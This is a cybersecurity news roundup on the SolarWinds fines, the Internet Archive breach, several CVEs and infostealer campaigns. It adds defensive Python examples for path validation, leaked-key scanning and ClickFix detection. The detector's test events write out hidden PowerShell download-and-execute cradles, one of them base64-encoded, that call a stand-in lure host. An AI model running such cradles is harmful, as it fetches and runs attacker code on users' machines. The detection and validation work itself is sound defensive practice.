SolarWinds disclosure fines, Zendesk helps Internet Archive, Samsung zero-day

In today’s cybersecurity news…

Four cyber companies fined for SolarWinds disclosure failures

On Tuesday, the Securities and Exchange Commission (SEC) announced fines totaling roughly $6 million against Check Point, Avaya, Unisys and Mimecast for their lackluster disclosures related to the 2020 SolarWinds Orion software compromise. The SEC said the companies made “materially misleading” disclosures related to the incident that further victimized shareholders and the investment community. The fines are the result of a years-long investigation into public companies potentially impacted by the SolarWinds compromise.

(The Record and TechCrunch)

Zendesk helps Internet Archive after hacker breached email system

Following up on a story we brought to you Monday on Cyber Security Headlines, the customer service platform Zendesk said Tuesday that it helped the Internet Archive resolve a breach it suffered over the weekend. The attacker used unsecured authentication tokens to access the Archive's Zendesk instance and then sent emails to Archive users complaining that the Archive had failed to rotate its API keys despite being alerted to the exposure two weeks earlier. A Zendesk spokesperson said that while the company helped the Archive secure its account, the Zendesk platform itself was not compromised in the incident.

(The Record)

Samsung zero-day under active exploit

A zero-day vulnerability (CVE-2024-44068) has been discovered in Samsung's mobile processors and is being used in an exploit chain for arbitrary code execution. NIST's advisory describes the flaw as a use-after-free bug in the m2m scaler driver of Samsung Mobile and Wearable Processors (Exynos 9820, 9825, 980, 990, 850, and W920) that leads to privilege escalation. The vulnerability is rated high severity with a CVSS score of 8.1 out of 10. Samsung issued a patch as part of its October security updates.

(Dark Reading)

OPA for Windows vulnerability exposes credentials

Security firm Tenable has advised organizations using Open Policy Agent (OPA) for Windows to update to v0.68.0 or later to protect against an authentication hash leakage vulnerability (CVE-2024-8260). The vulnerability stems from improper input validation and allows attackers to trick OPA into accessing a malicious Server Message Block (SMB) share. From there, an attacker could capture Net-NTLMv2 hashed credentials and crack them offline or relay them to authenticate to other systems. Tenable said the vulnerability highlights the risks organizations face when consuming open source software and code and “underscores the need for collaboration between security and engineering teams to mitigate such risks.”

(Dark Reading)
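As an added illustration (not OPA's code, Tenable's findings, or the actual fix shipped in v0.68.0), the check below shows the kind of input validation that closes this class of bug. A Windows program handed an attacker-controlled file path must refuse anything Windows would resolve as a UNC or device path before it touches the filesystem, because merely opening \\host\share\file makes the OS connect to host over SMB and authenticate as the current user. The sample arguments are constructed, and the function names are this example's own.

```python
import re
from typing import NamedTuple, Optional

# Captures the host of a classic \\host\share or extended \\?\UNC\host\share path.
# Device paths such as \\?\C:\... or \\.\pipe\... match is_unc_path() but yield no host.
_UNC_HOST = re.compile(r"^[\\/]{2}(?:\?[\\/]UNC[\\/])?([^\\/?.][^\\/]*)", re.I)


def is_unc_path(p: str) -> bool:
    r"""Return True if Windows would treat p as a UNC or device path.

    The rule is simply "two leading separators". Windows accepts '/' as well as
    a backslash here, so //host/share/file opens an SMB connection exactly like
    \\host\share\file does. Extended local paths (\\?\C:\...) are rejected too,
    a deliberately conservative choice for a tool that only needs local files.
    """
    return len(p) >= 2 and p[0] in "\\/" and p[1] in "\\/"


def unc_host(p: str) -> Optional[str]:
    """Return the remote host a UNC path would connect to, or None if there is none."""
    m = _UNC_HOST.match(p)
    return m.group(1) if m else None


class Rejected(NamedTuple):
    path: str
    reason: str


def partition_local_paths(args):
    """Split path arguments into those safe to open locally and those rejected.

    Rejection happens before any open() call: the outbound SMB connection (and the
    NTLM authentication that rides on it) is triggered by the open itself, so a
    check that runs afterwards is too late.
    """
    accepted, rejected = [], []
    for a in args:
        p = a.strip()  # leading whitespace must not hide the leading separators
        if is_unc_path(p):
            host = unc_host(p)
            reason = f"would connect to {host} over SMB" if host else "device or extended path"
            rejected.append(Rejected(a, reason))
        else:
            accepted.append(a)
    return accepted, rejected


SAMPLE_ARGS = [  # constructed command-line arguments, as a policy CLI might receive them
    r"C:\policies\authz.rego",
    r"\\10.0.0.5\share\authz.rego",
    "//10.0.0.5/share/data.json",
    r"\\?\UNC\10.0.0.5\share\data.json",
    r"\\?\C:\policies\data.json",
    "./data.json",
]


if __name__ == "__main__":
    ok, bad = partition_local_paths(SAMPLE_ARGS)
    for path in ok:
        print(f"accepted: {path}")
    for r in bad:
        print(f"rejected: {r.path}  ({r.reason})")
```

The forward-slash form matters: a filter that only looks for a leading double backslash is trivially bypassed with //host/share, which Windows resolves the same way.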

Thanks to today’s episode sponsor, SpyCloud


Exploit released for new Windows Server “WinReg” attack

Proof-of-concept exploit code is now public for a vulnerability in Microsoft's Remote Registry client (CVE-2024-43532) that falls back to older transport protocols when SMB transport is unavailable. An attacker positioned to intercept the fallback connection could relay the client's NTLM authentication to Active Directory Certificate Services (ADCS) and obtain a user certificate for further domain authentication. The flaw affects all Windows Server versions from 2008 through 2022 as well as Windows 10 and Windows 11. Akamai researcher Stiv Kupchik originally disclosed the issue in February, after which Microsoft dismissed the report as a documentation issue. In mid-June, Kupchik resubmitted the report with a better proof-of-concept (PoC) and explanation, leading Microsoft to confirm the issue in early July and issue a fix earlier this month. Akamai provided methods of detecting vulnerable services and recommends that organizations use Event Tracing for Windows (ETW) to monitor for related RPC calls.

(Bleeping Computer)

Tricky CAPTCHA scheme is dropping Lumma Stealer

Lumma Stealer, which operates as malware-as-a-service (MaaS), features in a new campaign that uses malicious CAPTCHA pages to trick targets into clicking through a fake “verification” process. A security researcher from Qualys said, “When the user clicks the ‘I’m not a robot’ button, verification steps are presented.” Once the user completes these steps, a PowerShell command drops a malware downloader onto the target machine. Previous Lumma Stealer campaigns have ranged from basic phishing to more sophisticated schemes on platforms like YouTube and Facebook.

(Dark Reading)

Cloud auth keys found in popular mobile apps

Symantec has reported that multiple popular mobile applications for iOS and Android come with hardcoded, unencrypted credentials for cloud services like Amazon Web Services (AWS) and Microsoft Azure Blob Storage. Symantec says these keys are present in the apps’ codebases because of errors and bad practices during the development phase. Exposing these types of credentials can easily lead to unauthorized access to storage buckets and databases with sensitive user data. The exposed creds were found in at least thirteen apps including Pic Stitch, Meru Cabs, and Crumbl, which have registered more than 4 million downloads each.

(Bleeping Computer)
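As an added example (not Symantec's tooling or code from the original article), the scanner below shows how such credentials are found in an app build: after unpacking an APK or IPA, run credential-format regexes over the recovered strings and source. The sample input is a constructed fragment with placeholder keys. The patterns are the published formats of AWS access key IDs (AKIA/ASIA prefix, 20 characters), 40-character AWS secret keys, and the 88-character AccountKey= field of an Azure Storage connection string; anything this finds is a leak to revoke and rotate, not merely a finding to log.

```python
import re
from typing import NamedTuple


class Finding(NamedTuple):
    kind: str
    value: str
    line_no: int


# Credential formats for the two services named in the report. AWS access key IDs are
# 20 characters starting with AKIA (long-term) or ASIA (temporary); AWS secret keys are
# 40 base64-like characters; an Azure Storage account key is 64 bytes, i.e. 88 base64
# characters ending in "==", and appears as the AccountKey= field of a connection string.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws.{0,20}?secret.{0,20}?[\"']([0-9A-Za-z/+]{40})[\"']"),
    "azure_storage_account_key": re.compile(r"AccountKey=([A-Za-z0-9+/]{86}==)"),
}


def scan_text(text: str) -> list[Finding]:
    """Return every credential-shaped string in text, ordered by line number."""
    findings = []
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            value = m.group(1) if m.groups() else m.group(0)
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append(Finding(kind, value, line_no))
    return sorted(findings, key=lambda f: f.line_no)


def redact(value: str) -> str:
    """Keep only the identifying prefix so a report does not re-leak the secret."""
    return value[:4] + "*" * (len(value) - 4)


# Constructed sample: Java-style strings as recovered from a decompiled app build.
# The keys are placeholders (the AWS secret is AWS's own documentation example).
_AZURE_PLACEHOLDER = "Q" * 86 + "=="
SAMPLE = f"""\
// constructed sample: strings recovered from a decompiled app build (placeholder keys)
static final String BUCKET = "user-uploads-prod";
static final String AWS_ACCESS_KEY = "AKIAEXAMPLE000000001";
static final String AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY";
String conn = "DefaultEndpointsProtocol=https;AccountName=appstore;AccountKey={_AZURE_PLACEHOLDER};EndpointSuffix=core.windows.net";
"""


if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f"line {f.line_no}: {f.kind} = {redact(f.value)}")
```

Regex scanners of this kind produce false positives on high-entropy strings, so a real pipeline would confirm a hit by checking the key against the provider (an access key ID can be checked against STS without using it for anything else) before treating it as live, and would run in CI on every build rather than on a shipped app.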

Swarms of fake WordPress plug-ins infect sites with infostealers

Domain registrar GoDaddy is warning of a campaign it calls “ClickFix” that spreads malware disguised as a fake browser update. Threat actors appear to have used stolen WordPress admin credentials to generate the malicious plugins systematically from a common template, which lets them scale the operation and adds complexity for detection. GoDaddy says it has tracked the ClickFix campaign since August 2023 and has spotted it on more than 25,000 compromised sites worldwide; ClickFix infected more than 6,000 WordPress sites in a single day in early September. GoDaddy has not yet determined how the WordPress credentials were stolen but has published a long list of indicators of compromise (IoCs) associated with the campaign.

(Dark Reading)
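Both the Lumma CAPTCHA lure above and the fake-browser-update ClickFix campaign in this item rely on the victim running a command by hand; the page states the PowerShell step only for the Lumma campaign, so extending it to the GoDaddy campaign is an assumption here. The following detection logic is an added example, not code from Qualys, GoDaddy or the original page. It runs over constructed Sysmon-style process-creation events (field names ParentImage, Image, CommandLine) and flags PowerShell launched from explorer.exe with a hidden window, an encoded command, an execution-policy bypass or a download cradle, decoding -EncodedCommand payloads so the same checks apply to what the base64 hides. Hostnames in the sample use the reserved .invalid TLD.

```python
import base64
import re
from dataclasses import dataclass, field

# Command-line traits a pasted "verification" command typically combines.
# Matched case-insensitively; each maps to a human-readable reason.
SUSPICIOUS_ARGS = {
    "hidden window":           r"-w(?:indowstyle)?\s+h(?:idden)?\b",
    "encoded command":         r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",
    "execution policy bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "invoke-expression":       r"\biex\b|invoke-expression",
    "download cradle":         r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|\bcurl\b|\bwget\b",
}
_ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand argument (base64 over UTF-16LE), or ''."""
    m = _ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


@dataclass
class Verdict:
    alert: bool
    reasons: list = field(default_factory=list)


def analyze(event: dict) -> Verdict:
    """Score one process-creation event for the ClickFix pattern."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return Verdict(False)
    # Scan the visible command line plus whatever an -EncodedCommand hides.
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    traits = [reason for reason, pat in SUSPICIOUS_ARGS.items() if re.search(pat, text, re.I)]
    from_explorer = parent.endswith("explorer.exe")
    # Pasting into the Run dialog gives explorer.exe as parent, but so does opening a
    # shell from the Start menu, so the parent alone never alerts; it only lowers the
    # bar from two suspicious traits to one.
    alert = len(traits) >= 2 or (from_explorer and len(traits) >= 1)
    reasons = traits + (["launched from explorer.exe (Run dialog / pasted command)"] if from_explorer else [])
    return Verdict(alert, reasons)


def analyze_events(events) -> list:
    return [analyze(e) for e in events]


def _encode_ps(cmd: str) -> str:
    # PowerShell's -EncodedCommand expects base64 over UTF-16LE text.
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed Sysmon-style process-creation events, not real telemetry
    # scheduled script: benign
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    # user opens a shell from the Start menu: explorer parent but no traits, benign
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe"},
    # plaintext pasted cradle
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://lure.example.invalid/v.txt -UseBasicParsing).Content"'},
    # the same cradle hidden behind -enc
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell -nop -w hidden -enc "
                    + _encode_ps("iex (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/p.ps1')")},
]


if __name__ == "__main__":
    for ev, v in zip(SAMPLE_EVENTS, analyze_events(SAMPLE_EVENTS)):
        print("ALERT " if v.alert else "ok    ", ev["CommandLine"][:60], v.reasons)
```

The decode step is what makes the fourth event detectable: on the raw command line only "hidden window" and "encoded command" are visible, and the download cradle appears only once the UTF-16LE payload is decoded. A production rule would also cover mshta.exe and cmd.exe launched the same way, and would corroborate with clipboard telemetry, but the parent-plus-traits logic is the core of it.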
